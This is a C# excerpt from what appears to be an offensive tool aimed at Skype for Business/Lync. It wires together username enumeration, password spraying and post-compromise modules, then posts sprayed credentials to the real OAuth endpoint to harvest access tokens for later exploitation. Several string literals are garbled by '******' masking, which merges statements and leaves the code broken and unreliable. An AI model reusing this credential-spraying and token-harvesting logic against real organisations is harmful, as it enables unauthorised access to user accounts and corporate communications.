public static ServiceInterface getOrCreateServiceInterface(List <ServiceInterface> serviceInterfaces, MainWindow UI, ObservableCollection <Hostnames> enumeratedHostnames)
{
if (serviceInterfaces.Any(u => u.service == MicrosoftService.Skype))
{
UI.ThreadSafeAppendLog("[3]Selecting existing Skype interface...");
IEnumerable <ServiceInterface> allSkype = serviceInterfaces.Where(x => x.service == MicrosoftService.Skype);
foreach (ServiceInterface serv in allSkype)
{
if (serv.host.RealLync == true)
{
serv.postCompromise.RealAddress = serv.host.Hostname;
return(serv);
}
}
}
else
{
//Don't already have service interface for skype - so create if we can
if (enumeratedHostnames.Any(x => x.Service == MicrosoftService.Skype && x.RealLync == true))
{
Hostnames enumeratorHostname = (enumeratedHostnames.Where(x => x.Service == MicrosoftService.Skype && x.RealLync == true)).First();
UI.ThreadSafeAppendLog("[3]Adding new enumerator with service: " + MicrosoftService.Skype);
ServiceInterface serviceInterface = new ServiceInterface()
{
host = enumeratorHostname, service = MicrosoftService.Skype, UI = UI, enumerator = new UsernameEnumeration(), sprayer = new PasswordSpray(), postCompromise = new PostCompromise()
{
RealAddress = enumeratorHostname.Hostname, UI = UI
}
};
serviceInterfaces.Add(serviceInterface);
return(serviceInterface);
}
else
{
//error message comes from what calls this
return(null);
}
}
return(null);
}
public static Boolean PreEmptOAuthPostExploit(CredentialsRecord record, List <ServiceInterface> serviceInterfaces, MainWindow UI, ObservableCollection <Hostnames> enumeratedHostnames)
{
if (record.Token != "" && record.Token != null)
{
return(true);
}
else
{
ServiceInterface serviceInterface = getOrCreateServiceInterface(serviceInterfaces, UI, enumeratedHostnames);
if (serviceInterface != null)
{
//So basically - we need to auth to the REAL SKYPE interface AUTH ENDPOINT - IF it is oauth - and get the token - add it to this record and change the record's service to Skype
//THIS IS THEN ONE ALREADY SET UP - REAL LYNC ETC - SO JUST GO - WITH NEW USERNAME LIST
//Check it is not an NTLM endpoint or such for Skype
if (serviceInterface.host.SprayURL.Url != "" && serviceInterface.host.SprayURL.Url != null)
{
if (serviceInterface.host.SprayURL.Url.Contains("oauthtoken"))
{
//This CAN BE either legacy or modern format - so just go with what we have as known valid
//Only causes issue with legacy here if user is invalid = v slow
string domainUser = record.Username;
UI.ThreadSafeAppendLog("[4]Record username in required format: " + domainUser);
string postData = "grant_type=password&username="******"&password="******"application/x-www-form-urlencoded";
request.UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0";
request.Method = "POST";
var data = Encoding.ASCII.GetBytes(postData);
request.ContentLength = data.Length;
try
{
using (var stream = request.GetRequestStream())
{
stream.Write(data, 0, data.Length);
}
var response = (HttpWebResponse)request.GetResponse();
var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
response.Close();
UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);
if (responseString.Contains("access_token"))
{
//Add access token to existing record
Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
if (accessTokenMatch.Success)
{
string accessToken = accessTokenMatch.Value;
record.Token = accessToken;
record.Service = MicrosoftService.Skype;
UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
return(false);
}
}
}
catch (WebException webException3)
{
HttpWebResponse response = webException3.Response as HttpWebResponse;
try
{
var responseString = new StreamReader(response.GetResponseStream()).ReadToEnd();
UI.ThreadSafeAppendLog("[4]Response to PreemptPostExploit: " + responseString);
if (responseString.Contains("access_token"))
{
Match accessTokenMatch = RegexClass.ReturnMatch(Regexs.cwtToken, responseString);
if (accessTokenMatch.Success)
{
string accessToken = accessTokenMatch.Value;
record.Token = accessToken;
record.Service = MicrosoftService.Skype;
UI.ThreadSafeAppendLog("[2]Valid access token added for user: "******"[1]Valid Credentials found for user: "******", but unable to match access token.");
return(false);
}
}
else if (responseString.Contains("Bad Request"))
{
UI.ThreadSafeAppendLog("[1]Valid credentials found - User not SIP enabled or similar: " + record.Username);
return(false);
}
}
catch (Exception esdf)
{
UI.ThreadSafeAppendLog("[1]Exception: " + esdf.ToString());
return(false);
}
}
catch (Exception ex)
{
UI.ThreadSafeAppendLog("[1]Exception: " + ex.ToString());
return(false);
}
}
else
{
UI.ThreadSafeAppendLog("[1]Oauth URL not found for Skype host - perhaps the password spray URL is NTLM authentication or other...");
return(false);
}
}
else
{
UI.ThreadSafeAppendLog("[1]No valid authentication URL...");
return(false);
}
}
else
{
UI.ThreadSafeAppendLog("[1]No valid Skype host for authenticaton...");
return(false);
}
}
return(false);
}
